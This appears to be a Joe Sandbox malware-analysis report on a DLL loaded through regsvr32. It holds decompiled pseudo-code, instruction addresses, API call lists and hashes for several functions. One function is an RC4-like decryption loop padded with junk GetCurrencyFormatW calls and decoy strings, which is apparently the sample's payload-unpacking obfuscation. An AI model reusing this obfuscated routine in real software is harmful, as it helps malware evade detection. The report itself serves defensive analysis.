							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1001E058))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E1000567F(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E10001260(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E10004E3A(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}































                                                                                                            0x1001db64
                                                                                                            0x1001db6b
                                                                                                            0x1001db70
                                                                                                            0x1001db73
                                                                                                            0x1001db77
                                                                                                            0x1001e050
                                                                                                            0x1001e055
                                                                                                            0x1001e055
                                                                                                            0x1001db7d
                                                                                                            0x1001db80
                                                                                                            0x1001db83
                                                                                                            0x1001db86
                                                                                                            0x1001db90
                                                                                                            0x1001db93
                                                                                                            0x1001db98
                                                                                                            0x1001db9e
                                                                                                            0x1001dba9
                                                                                                            0x1001dba9
                                                                                                            0x1001dbb0
                                                                                                            0x1001dbb7
                                                                                                            0x1001dbbc
                                                                                                            0x1001dbc3
                                                                                                            0x1001dbc3
                                                                                                            0x1001dbc6
                                                                                                            0x1001dbcd
                                                                                                            0x1001dbd0
                                                                                                            0x1001dbd3
                                                                                                            0x1001dbd6
                                                                                                            0x1001dbd9
                                                                                                            0x1001dbdc
                                                                                                            0x1001dbe0
                                                                                                            0x1001dbe4
                                                                                                            0x1001dbe5
                                                                                                            0x1001de05
                                                                                                            0x1001de09
                                                                                                            0x1001de0b
                                                                                                            0x1001de14
                                                                                                            0x1001de16
                                                                                                            0x1001de16
                                                                                                            0x1001de23
                                                                                                            0x1001de2b
                                                                                                            0x1001de2d
                                                                                                            0x1001de59
                                                                                                            0x1001de5c
                                                                                                            0x1001de61
                                                                                                            0x1001de66
                                                                                                            0x1001de91
                                                                                                            0x1001de91
                                                                                                            0x1001de94
                                                                                                            0x1001de9d
                                                                                                            0x1001dea0
                                                                                                            0x1001df75
                                                                                                            0x1001df75
                                                                                                            0x1001df7b
                                                                                                            0x1001e032
                                                                                                            0x1001e035
                                                                                                            0x1001e039
                                                                                                            0x1001e03e
                                                                                                            0x1001e042
                                                                                                            0x1001e045
                                                                                                            0x1001e047
                                                                                                            0x1001e04a
                                                                                                            0x1001e04f
                                                                                                            0x00000000
                                                                                                            0x1001e045
                                                                                                            0x1001df85
                                                                                                            0x1001dfaa
                                                                                                            0x1001dfad
                                                                                                            0x1001dfb0
                                                                                                            0x1001dfb3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfb5
                                                                                                            0x00000000
                                                                                                            0x1001dfc6
                                                                                                            0x1001dfcd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001e02a
                                                                                                            0x1001e02d
                                                                                                            0x1001e030
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfe5
                                                                                                            0x1001dfe8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfef
                                                                                                            0x1001dff2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfd2
                                                                                                            0x1001dfd5
                                                                                                            0x1001dfd8
                                                                                                            0x1001dfda
                                                                                                            0x1001dfdd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dffc
                                                                                                            0x1001e001
                                                                                                            0x1001e004
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001e00c
                                                                                                            0x1001e00f
                                                                                                            0x1001e011
                                                                                                            0x1001e015
                                                                                                            0x1001e018
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001e01c
                                                                                                            0x1001e01f
                                                                                                            0x1001e022
                                                                                                            0x1001e023
                                                                                                            0x1001e024
                                                                                                            0x1001e025
                                                                                                            0x1001e026
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dfb5
                                                                                                            0x1001df89
                                                                                                            0x1001df8e
                                                                                                            0x1001df94
                                                                                                            0x1001df96
                                                                                                            0x1001df98
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001df9e
                                                                                                            0x1001dfa4
                                                                                                            0x1001debc
                                                                                                            0x1001debc
                                                                                                            0x1001dec1
                                                                                                            0x1001dec1
                                                                                                            0x1001dec4
                                                                                                            0x1001decd
                                                                                                            0x1001decd
                                                                                                            0x1001ded2
                                                                                                            0x1001ded8
                                                                                                            0x1001dedb
                                                                                                            0x1001dedd
                                                                                                            0x1001dee1
                                                                                                            0x1001dee3
                                                                                                            0x1001deeb
                                                                                                            0x1001deec
                                                                                                            0x1001def2
                                                                                                            0x1001def2
                                                                                                            0x1001def4
                                                                                                            0x1001defa
                                                                                                            0x1001df00
                                                                                                            0x1001df08
                                                                                                            0x1001df10
                                                                                                            0x1001df13
                                                                                                            0x1001df13
                                                                                                            0x1001df1e
                                                                                                            0x1001df24
                                                                                                            0x1001df26
                                                                                                            0x1001df2d
                                                                                                            0x1001df32
                                                                                                            0x1001df35
                                                                                                            0x1001df35
                                                                                                            0x1001df3d
                                                                                                            0x1001df3f
                                                                                                            0x1001df46
                                                                                                            0x1001df4b
                                                                                                            0x1001df4e
                                                                                                            0x1001df4e
                                                                                                            0x1001df56
                                                                                                            0x1001df5b
                                                                                                            0x1001df61
                                                                                                            0x1001df6d
                                                                                                            0x1001df70
                                                                                                            0x00000000
                                                                                                            0x1001df70
                                                                                                            0x1001deaa
                                                                                                            0x1001deb0
                                                                                                            0x1001deb7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001deb9
                                                                                                            0x00000000
                                                                                                            0x1001de68
                                                                                                            0x1001de6b
                                                                                                            0x1001de71
                                                                                                            0x1001de8c
                                                                                                            0x1001de8c
                                                                                                            0x1001de8f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001de77
                                                                                                            0x1001de79
                                                                                                            0x1001de7b
                                                                                                            0x1001de81
                                                                                                            0x1001de82
                                                                                                            0x1001de88
                                                                                                            0x1001de88
                                                                                                            0x1001de8b
                                                                                                            0x1001de8b
                                                                                                            0x00000000
                                                                                                            0x1001de8b
                                                                                                            0x1001de7d
                                                                                                            0x1001de7f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001de7f
                                                                                                            0x00000000
                                                                                                            0x1001de8c
                                                                                                            0x1001dbeb
                                                                                                            0x1001dbef
                                                                                                            0x1001dbff
                                                                                                            0x1001dc0a
                                                                                                            0x1001dc0d
                                                                                                            0x1001dc15
                                                                                                            0x1001dc18
                                                                                                            0x1001dc1b
                                                                                                            0x1001dc21
                                                                                                            0x1001dc21
                                                                                                            0x1001dc25
                                                                                                            0x1001dc28
                                                                                                            0x1001dc2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc31
                                                                                                            0x1001dc36
                                                                                                            0x1001dc39
                                                                                                            0x1001dc3f
                                                                                                            0x1001dc42
                                                                                                            0x1001dc45
                                                                                                            0x1001dc48
                                                                                                            0x1001dc4e
                                                                                                            0x1001dc51
                                                                                                            0x1001dc54
                                                                                                            0x1001dc5e
                                                                                                            0x1001dc5e
                                                                                                            0x1001dc61
                                                                                                            0x1001dc69
                                                                                                            0x1001dc6b
                                                                                                            0x1001dd88
                                                                                                            0x1001dd8d
                                                                                                            0x1001dd90
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd92
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd99
                                                                                                            0x1001dd9c
                                                                                                            0x1001dd9e
                                                                                                            0x1001dda4
                                                                                                            0x1001ddae
                                                                                                            0x1001ddb5
                                                                                                            0x1001ddb7
                                                                                                            0x1001ddc3
                                                                                                            0x1001ddc7
                                                                                                            0x1001ddcc
                                                                                                            0x1001ddd0
                                                                                                            0x1001ddd4
                                                                                                            0x1001ddd6
                                                                                                            0x1001ddd9
                                                                                                            0x1001ddde
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc71
                                                                                                            0x1001dc71
                                                                                                            0x1001dde1
                                                                                                            0x1001dde1
                                                                                                            0x1001dde4
                                                                                                            0x1001dde4
                                                                                                            0x1001dde8
                                                                                                            0x00000000
                                                                                                            0x1001dde8
                                                                                                            0x1001dc78
                                                                                                            0x1001dc7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc82
                                                                                                            0x00000000
                                                                                                            0x1001dc97
                                                                                                            0x1001dc9a
                                                                                                            0x1001dc9c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dcbf
                                                                                                            0x1001dcc3
                                                                                                            0x1001dcc8
                                                                                                            0x1001dccb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dcd2
                                                                                                            0x1001dcd6
                                                                                                            0x1001dcdb
                                                                                                            0x1001dcde
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dce5
                                                                                                            0x1001dce8
                                                                                                            0x1001dcea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dcee
                                                                                                            0x1001dcf1
                                                                                                            0x1001dcf3
                                                                                                            0x1001dcf5
                                                                                                            0x1001dcf6
                                                                                                            0x1001dcf9
                                                                                                            0x1001dcff
                                                                                                            0x1001dd03
                                                                                                            0x1001dd05
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd0b
                                                                                                            0x1001dd0d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd60
                                                                                                            0x1001dd63
                                                                                                            0x1001dd67
                                                                                                            0x1001dd69
                                                                                                            0x1001dd6b
                                                                                                            0x1001dd6b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd70
                                                                                                            0x1001dd74
                                                                                                            0x1001dd77
                                                                                                            0x1001dd7a
                                                                                                            0x1001dd7c
                                                                                                            0x1001dd7d
                                                                                                            0x1001dd7e
                                                                                                            0x1001dd7f
                                                                                                            0x1001dd80
                                                                                                            0x1001dd83
                                                                                                            0x1001dd85
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dd18
                                                                                                            0x1001dd18
                                                                                                            0x1001dd1b
                                                                                                            0x1001dd1d
                                                                                                            0x1001dd1f
                                                                                                            0x1001dd20
                                                                                                            0x1001dd23
                                                                                                            0x1001dd26
                                                                                                            0x1001dd2b
                                                                                                            0x1001dd2e
                                                                                                            0x1001dd32
                                                                                                            0x1001dd38
                                                                                                            0x1001dd3c
                                                                                                            0x1001dd3e
                                                                                                            0x1001dd44
                                                                                                            0x1001dd44
                                                                                                            0x1001dd47
                                                                                                            0x1001dd4a
                                                                                                            0x1001dd4d
                                                                                                            0x1001dd52
                                                                                                            0x1001dd56
                                                                                                            0x00000000
                                                                                                            0x1001dd56
                                                                                                            0x1001dd40
                                                                                                            0x1001dd42
                                                                                                            0x1001dd13
                                                                                                            0x1001dd13
                                                                                                            0x00000000
                                                                                                            0x1001dd13
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc89
                                                                                                            0x1001dc8c
                                                                                                            0x1001dc90
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dca4
                                                                                                            0x1001dca7
                                                                                                            0x1001dcaa
                                                                                                            0x1001dcad
                                                                                                            0x1001dcad
                                                                                                            0x1001dcb0
                                                                                                            0x1001dcb0
                                                                                                            0x1001dcb2
                                                                                                            0x1001dcb7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001dc82
                                                                                                            0x1001ddea
                                                                                                            0x1001ddea
                                                                                                            0x1001ddee
                                                                                                            0x1001ddf1
                                                                                                            0x1001ddfa
                                                                                                            0x1001ddfa
                                                                                                            0x1001de03
                                                                                                            0x00000000
                                                                                                            0x1001de03

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4128688680-0
                                                                                                            • Opcode ID: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
                                                                                                            • Instruction ID: d0b60735e7dfbc48b8ffc6b3fb26c55a134f5783589098a9cdb935b98e8b1adc
                                                                                                            • Opcode Fuzzy Hash: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
                                                                                                            • Instruction Fuzzy Hash: 77F1797090024ADFDF11EFA8D880AAEBBB5FF09340F11806AE851AB261D774DE95CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100083A5 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E100083A5() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100482fc; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x10048300 = E1000834D(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100482e0 = 0;
						 *0x100482e4 = 0;
						 *0x100482e8 = 0;
						 *0x100482ec = 0;
						 *0x100482f0 = 0;
						 *0x100482f4 = 0;
						 *0x100482f8 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100482e0 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100482e4 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100482e8 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100482ec = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100482f4 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100482f0 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100482f8 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100482fc = 1;
					return _t5;
				} else {
					_t24 =  *0x100482f0; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                            0x100083a8
                                                                                                            0x100083ae
                                                                                                            0x100083bd
                                                                                                            0x100083c9
                                                                                                            0x100083d4
                                                                                                            0x100083d6
                                                                                                            0x100083d8
                                                                                                            0x1000846c
                                                                                                            0x1000846c
                                                                                                            0x10008472
                                                                                                            0x10008478
                                                                                                            0x1000847e
                                                                                                            0x10008484
                                                                                                            0x1000848a
                                                                                                            0x10008490
                                                                                                            0x10008496
                                                                                                            0x100083de
                                                                                                            0x100083ea
                                                                                                            0x100083ec
                                                                                                            0x100083ee
                                                                                                            0x100083f3
                                                                                                            0x00000000
                                                                                                            0x100083f5
                                                                                                            0x100083fb
                                                                                                            0x100083fd
                                                                                                            0x100083ff
                                                                                                            0x10008404
                                                                                                            0x00000000
                                                                                                            0x10008406
                                                                                                            0x1000840c
                                                                                                            0x1000840e
                                                                                                            0x10008410
                                                                                                            0x10008415
                                                                                                            0x00000000
                                                                                                            0x10008417
                                                                                                            0x1000841d
                                                                                                            0x1000841f
                                                                                                            0x10008421
                                                                                                            0x10008426
                                                                                                            0x00000000
                                                                                                            0x10008428
                                                                                                            0x1000842e
                                                                                                            0x10008430
                                                                                                            0x10008432
                                                                                                            0x10008437
                                                                                                            0x00000000
                                                                                                            0x10008439
                                                                                                            0x1000843f
                                                                                                            0x10008441
                                                                                                            0x10008443
                                                                                                            0x10008448
                                                                                                            0x00000000
                                                                                                            0x1000844a
                                                                                                            0x10008450
                                                                                                            0x10008452
                                                                                                            0x10008454
                                                                                                            0x10008459
                                                                                                            0x00000000
                                                                                                            0x1000845b
                                                                                                            0x1000845d
                                                                                                            0x1000845d
                                                                                                            0x1000845d
                                                                                                            0x10008459
                                                                                                            0x10008448
                                                                                                            0x10008437
                                                                                                            0x10008426
                                                                                                            0x10008415
                                                                                                            0x10008404
                                                                                                            0x100083f3
                                                                                                            0x10008460
                                                                                                            0x1000846b
                                                                                                            0x100083b0
                                                                                                            0x100083b2
                                                                                                            0x100083bc
                                                                                                            0x100083bc

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,74785D80,100084F1,?,?,?,?,?,?,?,1000A3B2,00000000,00000002,00000028), ref: 100083CE
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100083EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100083FB
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000840C
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000841D
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000842E
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000843F
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10008450
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                            • API String ID: 667068680-68207542
                                                                                                            • Opcode ID: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
                                                                                                            • Instruction ID: 374b253654f9bab27aaa6d0bbf775ac5182f219bddcb8a0b2eb046c4e2c1642a
                                                                                                            • Opcode Fuzzy Hash: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
                                                                                                            • Instruction Fuzzy Hash: B5214F70901D229FE352EF294FC086EBAF4F34B281751493ED248D6221D7744241EB5D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001B36 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 205COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10001B36(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v25;
				signed int _t85;
				signed int _t94;
				signed int _t128;
				intOrPtr _t149;
				short* _t151;
				short* _t182;

				_t84 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_a24 > 0) {
					_v24 = _a4 - _a12 + _a8;
					_t151 = L"xadqsavcbdfewescGADW";
					_t182 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t85 = GetCurrencyFormatW(_t84, 0x11d4, _t182, _t84, _t151, 0x22b9);
						asm("cdq");
						_v20 = (_t85 * _v24 *  *0x100440dc + _v20 + 1) % 0x4708;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20;
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v16 = (( *(_t94 * _v24 *  *0x100440d0 + _v20 + _a16) & 0x000000ff) + _v16) % 0x4708;
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16;
						_v25 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d0 + _v20 + _a16));
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16 + _a16;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20 + _a16)) =  *_v8;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v16 + _a16)) = _v25;
						_v8 =  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440cc + _v16 + _a16) & 0x000000ff;
						_t128 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v8 = (( *(_t128 * _v24 *  *0x100440cc + _v20 + _a16) & 0x000000ff) + _v8) % 0x4708;
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d8 + _v8;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v12 + _a20;
						 *_v4 =  *_v4 ^  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v8 + _a16);
						_v12 = _v12 + 1;
						_t149 = _v12;
						if(_t149 >= _a24) {
							break;
						}
						_t84 = 0;
					}
					return _t149;
				}
				return 0;
			}
















                                                                                                            0x10001b39
                                                                                                            0x10001b3f
                                                                                                            0x10001b43
                                                                                                            0x10001b47
                                                                                                            0x10001b4b
                                                                                                            0x10001b69
                                                                                                            0x10001b6d
                                                                                                            0x10001b72
                                                                                                            0x10001b80
                                                                                                            0x10001b8a
                                                                                                            0x10001ba0
                                                                                                            0x10001bb4
                                                                                                            0x10001bd6
                                                                                                            0x10001bda
                                                                                                            0x10001bfd
                                                                                                            0x10001c0c
                                                                                                            0x10001c2e
                                                                                                            0x10001c57
                                                                                                            0x10001c77
                                                                                                            0x10001ca9
                                                                                                            0x10001cd2
                                                                                                            0x10001cfb
                                                                                                            0x10001cff
                                                                                                            0x10001d22
                                                                                                            0x10001d31
                                                                                                            0x10001d53
                                                                                                            0x10001d73
                                                                                                            0x10001d9a
                                                                                                            0x10001d9c
                                                                                                            0x10001da0
                                                                                                            0x10001da8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001b7e
                                                                                                            0x10001b7e
                                                                                                            0x00000000
                                                                                                            0x10001db1
                                                                                                            0x10001db5

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001B8A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001BB8
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001BDA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C10
